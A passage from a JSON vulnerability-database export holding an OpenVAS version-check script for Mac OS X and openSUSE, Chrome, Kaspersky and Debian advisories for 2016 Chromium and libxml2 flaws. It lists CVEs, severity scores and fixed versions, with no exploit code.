"CVE-2016-6296"], "modified": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310807888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 September-2016\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807888\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2016-4694\", \"CVE-2016-5768\", \"CVE-2016-5769\", \"CVE-2016-5770\",\n \"CVE-2016-5771\", \"CVE-2016-5772\", \"CVE-2016-5773\", \"CVE-2016-6174\",\n \"CVE-2016-6288\", \"CVE-2016-6289\", \"CVE-2016-6290\", \"CVE-2016-6291\",\n \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-6295\", \"CVE-2016-6296\",\n \"CVE-2016-6297\", \"CVE-2016-4697\", \"CVE-2016-4696\", \"CVE-2016-4698\",\n \"CVE-2016-4699\", \"CVE-2016-4700\", \"CVE-2016-4701\", \"CVE-2016-4779\",\n \"CVE-2016-4702\", \"CVE-2016-4703\", \"CVE-2016-4706\", \"CVE-2016-4707\",\n \"CVE-2016-4708\", \"CVE-2016-4711\", \"CVE-2016-4712\", \"CVE-2016-4713\",\n \"CVE-2016-0755\", \"CVE-2016-4715\", \"CVE-2016-4716\", \"CVE-2016-4717\",\n \"CVE-2016-4718\", \"CVE-2016-4722\", \"CVE-2016-4723\", \"CVE-2016-4724\",\n \"CVE-2016-4725\", \"CVE-2016-4726\", \"CVE-2016-4727\", \"CVE-2016-4745\",\n \"CVE-2016-4771\", \"CVE-2016-4772\", \"CVE-2016-4773\", \"CVE-2016-4774\",\n \"CVE-2016-4776\", \"CVE-2016-4775\", \"CVE-2016-4777\", \"CVE-2016-4778\",\n \"CVE-2016-4736\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-4738\",\n \"CVE-2016-4739\", \"CVE-2016-4742\", \"CVE-2016-4748\", \"CVE-2016-4750\",\n \"CVE-2016-4752\", \"CVE-2016-4753\", \"CVE-2016-4755\", \"CVE-2016-4709\",\n \"CVE-2016-4710\");\n script_bugtraq_id(93063, 91396, 92074, 92073, 93054, 93055, 92095, 92094, 92097,\n 93059, 92078, 92053, 91732, 91399, 91398, 91397, 92099, 82307,\n 92111, 91403, 92115, 91401, 93060, 93056);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-09-28 12:22:55 +0530 (Wed, 28 Sep 2016)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 September-2016\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details\n refer the reference links.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code or cause a denial of service (memory corruption),\n gain access to potentially sensitive information, bypass certain protection\n mechanism and have other impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.7.5 through 10.11.x\n prior to 10.12\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12 or later. Please see the references for more information.\n\n Note: According to the vendor an upgrade to version 10.12 is required to\n mitigate this vulnerabilities. Please see the advisory (HT207170) for more info.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207170\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([7-9]|1[01])\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName && osVer =~ \"^10\\.([7-9]|1[01])\"){\n if(version_in_range(version:osVer, test_version: \"10.7.5\", test_version2:\"10.11.6\")){\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"According to the vendor an upgrade to version 10.12 is required to mitigate this vulnerabilities. Please see the advisory (HT207170) for more info.\");\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:25:25", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n - CVE-2016-1707: URL spoofing on iOS\n - CVE-2016-1708: Use-after-free in Extensions\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n - CVE-2016-1710: Same-origin bypass in Blink\n - CVE-2016-1711: Same-origin bypass in Blink\n - CVE-2016-5127: Use-after-free in Blink\n - CVE-2016-5128: Same-origin bypass in V8\n - CVE-2016-5129: Memory corruption in V8\n - CVE-2016-5130: URL spoofing\n - CVE-2016-5131: Use-after-free in libxml\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n - CVE-2016-5133: Origin confusion in proxy authentication\n - CVE-2016-5134: URL leakage via PAC script\n - CVE-2016-5135: Content-Security-Policy bypass\n - CVE-2016-5136: Use after free in extensions\n - CVE-2016-5137: History sniffing with HSTS and CSP\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\n\n", "cvss3": {}, "published": "2016-07-25T15:10:08", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-25T15:10:08", "id": "OPENSUSE-SU-2016:1868-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00021.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:29:34", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n - CVE-2016-1707: URL spoofing on iOS\n - CVE-2016-1708: Use-after-free in Extensions\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n - CVE-2016-1710: Same-origin bypass in Blink\n - CVE-2016-1711: Same-origin bypass in Blink\n - CVE-2016-5127: Use-after-free in Blink\n - CVE-2016-5128: Same-origin bypass in V8\n - CVE-2016-5129: Memory corruption in V8\n - CVE-2016-5130: URL spoofing\n - CVE-2016-5131: Use-after-free in libxml\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n - CVE-2016-5133: Origin confusion in proxy authentication\n - CVE-2016-5134: URL leakage via PAC script\n - CVE-2016-5135: Content-Security-Policy bypass\n - CVE-2016-5136: Use after free in extensions\n - CVE-2016-5137: History sniffing with HSTS and CSP\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\n\n", "cvss3": {}, "published": "2016-07-31T21:08:18", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-31T21:08:18", "id": "OPENSUSE-SU-2016:1918-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00028.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:11:40", "description": "Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n - CVE-2016-1707: URL spoofing on iOS\n - CVE-2016-1708: Use-after-free in Extensions\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n - CVE-2016-1710: Same-origin bypass in Blink\n - CVE-2016-1711: Same-origin bypass in Blink\n - CVE-2016-5127: Use-after-free in Blink\n - CVE-2016-5128: Same-origin bypass in V8\n - CVE-2016-5129: Memory corruption in V8\n - CVE-2016-5130: URL spoofing\n - CVE-2016-5131: Use-after-free in libxml\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n - CVE-2016-5133: Origin confusion in proxy authentication\n - CVE-2016-5134: URL leakage via PAC script\n - CVE-2016-5135: Content-Security-Policy bypass\n - CVE-2016-5136: Use after free in extensions\n - CVE-2016-5137: History sniffing with HSTS and CSP\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other\n initiatives\n\n", "cvss3": {}, "published": "2016-07-25T15:10:21", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2016-07-25T15:10:21", "id": "OPENSUSE-SU-2016:1869-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00022.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "chrome": [{"lastseen": "2023-06-03T20:07:01", "description": "The Chrome team is delighted to announce the promotion of Chrome 52 to the stable channel for Windows, Mac and Linux. Chrome 52.0.2743.82 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/51.0.2704.106..52.0.2743.82?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<http://chrome.blogspot.com/>) and[ Chromium](<http://blog.chromium.org/>) blog posts about new features and big efforts delivered in 52. \n\n\n#### Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed. \n\nThis update includes [48 security fixes](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3ARelease-0-M52>). Below, we highlight fixes that were contributed by external researchers. Please see the [Chromium security page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n[$15000][[610600](<https://crbug.com/610600>)] **High** CVE-2016-1706: Sandbox escape in PPAPI. Credit to Pinkie Pie \n[$3000][[622183](<https://crbug.com/622183>)] **High** CVE-2016-1707: URL spoofing on iOS. Credit to xisigr of Tencent's Xuanwu Lab \n[$500][[613949](<https://crbug.com/613949>)] **High** CVE-2016-1708: Use-after-free in Extensions. Credit to Adam Varsan \n[$500][[614934](<https://crbug.com/614934>)] **High** CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team \n[$8000][[616907](<https://crbug.com/616907>)] **High** CVE-2016-1710: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$7500][[617495](<https://crbug.com/617495>)] **High** CVE-2016-1711: Same-origin bypass in Blink. Credit to Mariusz Mlynski \n[$3000][[618237](<https://crbug.com/618237>)] **High** CVE-2016-5127: Use-after-free in Blink. Credit to cloudfuzzer \n[$7500][[619166](<https://crbug.com/619166>)] **High** CVE-2016-5128: Same-origin bypass in V8. Credit to Anonymous \n[$5000][[620553](<https://crbug.com/620553>)] **High** CVE-2016-5129: Memory corruption in V8. Credit to Jeonghoon Shin \n[$2000][[623319](<https://crbug.com/623319>)] **High** CVE-2016-5130: URL spoofing. Credit to Wadih Matar \n[$3500][[623378](<https://crbug.com/623378>)] **High** CVE-2016-5131: Use-after-free in libxml. Credit to Nick Wellnhofer \n[$1000][[607543](<https://crbug.com/607543>)] **Medium** CVE-2016-5132: Limited same-origin bypass in Service Workers. Credit to Ben Kelly \n[$1000][[613626](<https://crbug.com/613626>)] **Medium** CVE-2016-5133: Origin confusion in proxy authentication. Credit to Patch Eudor \n[$500][[593759](<https://crbug.com/593759>)] **Medium** CVE-2016-5134: URL leakage via PAC script. Credit to Alex Chapman and Paul Stone of Context Information Security \n[$500][[605451](<https://crbug.com/605451>)] **Medium** CVE-2016-5135: Content-Security-Policy bypass. Credit to ShenYeYinJiu of Tencent Security Response Center, TSRC \n[$1000][[625393](<https://crbug.com/625393>)] **Medium** CVE-2016-5136: Use after free in extensions. Credit to Rob Wu \n[$1000][[625945](<https://crbug.com/625945>)] **Medium** CVE-2016-5137: History sniffing with HSTS and CSP. Credit to Xiaoyin Liu \n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes: \n\n[[629852](<https://crbug.com/629852>)] CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives. \n\nMany of our security bugs are detected using [AddressSanitizer](<http://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>) or [LibFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>). \n\n\n\n\n\nInterested in switching release channels?[ Find out how](<http://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by[ filing a bug](<http://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues. \n\nKrishna Govind \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-20T00:00:00", "type": "chrome", "title": "Stable Channel Update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-20T00:00:00", "id": "GCSA-1145367273444230144", "href": "https://chromereleases.googleblog.com/2016/07/stable-channel-update.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-06-03T15:31:56", "description": "### *Detect date*:\n07/20/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, spoof user interface, bypass security restrictions, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 52.0.2743.82 (All branches)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/index.html>)\n\n### *Original advisories*:\n[Google Chrome realases blog](<http://googlechromereleases.blogspot.ru/2016/07/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5137](<https://vulners.com/cve/CVE-2016-5137>)4.3Warning \n[CVE-2016-5136](<https://vulners.com/cve/CVE-2016-5136>)6.8High \n[CVE-2016-5135](<https://vulners.com/cve/CVE-2016-5135>)4.3Warning \n[CVE-2016-5134](<https://vulners.com/cve/CVE-2016-5134>)4.3Warning \n[CVE-2016-5133](<https://vulners.com/cve/CVE-2016-5133>)4.3Warning \n[CVE-2016-5132](<https://vulners.com/cve/CVE-2016-5132>)6.8High \n[CVE-2016-5131](<https://vulners.com/cve/CVE-2016-5131>)6.8High \n[CVE-2016-5130](<https://vulners.com/cve/CVE-2016-5130>)4.3Warning \n[CVE-2016-5129](<https://vulners.com/cve/CVE-2016-5129>)6.8High \n[CVE-2016-5128](<https://vulners.com/cve/CVE-2016-5128>)6.8High \n[CVE-2016-5127](<https://vulners.com/cve/CVE-2016-5127>)6.8High \n[CVE-2016-1711](<https://vulners.com/cve/CVE-2016-1711>)6.8High \n[CVE-2016-1710](<https://vulners.com/cve/CVE-2016-1710>)6.8High \n[CVE-2016-1709](<https://vulners.com/cve/CVE-2016-1709>)6.8High \n[CVE-2016-1708](<https://vulners.com/cve/CVE-2016-1708>)6.8High \n[CVE-2016-1707](<https://vulners.com/cve/CVE-2016-1707>)4.3Warning \n[CVE-2016-1706](<https://vulners.com/cve/CVE-2016-1706>)9.3Critical \n[CVE-2016-1705](<https://vulners.com/cve/CVE-2016-1705>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-20T00:00:00", "type": "kaspersky", "title": "KLA10846 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2020-06-03T00:00:00", "id": "KLA10846", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10846/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-10T07:11:10", "description": "\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\n\n* [CVE-2016-1704](https://security-tracker.debian.org/tracker/CVE-2016-1704)\nThe chrome development team found and fixed various issues during\n internal auditing.\n* [CVE-2016-1705](https://security-tracker.debian.org/tracker/CVE-2016-1705)\nThe chrome development team found and fixed various issues during\n internal auditing.\n* [CVE-2016-1706](https://security-tracker.debian.org/tracker/CVE-2016-1706)\nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n* [CVE-2016-1707](https://security-tracker.debian.org/tracker/CVE-2016-1707)\nxisigr discovered a URL spoofing issue.\n* [CVE-2016-1708](https://security-tracker.debian.org/tracker/CVE-2016-1708)\nAdam Varsan discovered a use-after-free issue.\n* [CVE-2016-1709](https://security-tracker.debian.org/tracker/CVE-2016-1709)\nChenQin discovered a buffer overflow issue in the sfntly library.\n* [CVE-2016-1710](https://security-tracker.debian.org/tracker/CVE-2016-1710)\nMariusz Mlynski discovered a same-origin bypass.\n* [CVE-2016-1711](https://security-tracker.debian.org/tracker/CVE-2016-1711)\nMariusz Mlynski discovered another same-origin bypass.\n* [CVE-2016-5127](https://security-tracker.debian.org/tracker/CVE-2016-5127)\ncloudfuzzer discovered a use-after-free issue.\n* [CVE-2016-5128](https://security-tracker.debian.org/tracker/CVE-2016-5128)\nA same-origin bypass issue was discovered in the v8 javascript library.\n* [CVE-2016-5129](https://security-tracker.debian.org/tracker/CVE-2016-5129)\nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\n library.\n* [CVE-2016-5130](https://security-tracker.debian.org/tracker/CVE-2016-5130)\nWidih Matar discovered a URL spoofing issue.\n* [CVE-2016-5131](https://security-tracker.debian.org/tracker/CVE-2016-5131)\nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n* [CVE-2016-5132](https://security-tracker.debian.org/tracker/CVE-2016-5132)\nBen Kelly discovered a same-origin bypass.\n* [CVE-2016-5133](https://security-tracker.debian.org/tracker/CVE-2016-5133)\nPatch Eudor discovered an issue in proxy authentication.\n* [CVE-2016-5134](https://security-tracker.debian.org/tracker/CVE-2016-5134)\nPaul Stone discovered an information leak in the Proxy Auto-Config\n feature.\n* [CVE-2016-5135](https://security-tracker.debian.org/tracker/CVE-2016-5135)\nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n* [CVE-2016-5136](https://security-tracker.debian.org/tracker/CVE-2016-5136)\nRob Wu discovered a use-after-free issue.\n* [CVE-2016-5137](https://security-tracker.debian.org/tracker/CVE-2016-5137)\nXiaoyin Liu discovered a way to discover whether an HSTS web site had been\n visited.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 52.0.2743.82-1~deb8u1.\n\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-31T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1704", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2022-08-10T07:11:06", "id": "OSV:DSA-3637-1", "href": "https://osv.dev/vulnerability/DSA-3637-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:11:17", "description": "\nSeveral vulnerabilities were discovered in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. A remote attacker\ncould provide a specially crafted XML or HTML file that, when processed\nby an application using libxml2, would cause a denial-of-service against\nthe application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.9.1+dfsg1-5+deb8u4.\n\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\n\nWe recommend that you upgrade your libxml2 packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-23T00:00:00", "type": "osv", "title": "libxml2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2022-08-10T07:11:11", "id": "OSV:DSA-3744-1", "href": "https://osv.dev/vulnerability/DSA-3744-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T08:12:48", "description": "\n* [CVE-2016-4658](https://security-tracker.debian.org/tracker/CVE-2016-4658)\nNamespace nodes must be copied to avoid use-after-free errors.\n But they don't necessarily have a physical representation in a\n document, so simply disallow them in XPointer ranges.\n* [CVE-2016-5131](https://security-tracker.debian.org/tracker/CVE-2016-5131)\nThe old code would invoke the broken xmlXPtrRangeToFunction.\n range-to isn't really a function but a special kind of\n location step. Remove this function and always handle range-to\n in the XPath code.\n The old xmlXPtrRangeToFunction could also be abused to trigger\n a use-after-free error with the potential for remote code\n execution.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n2.8.0+dfsg1-7+wheezy7.\n\n\nWe recommend that you upgrade your libxml2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-31T00:00:00", "type": "osv", "title": "libxml2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 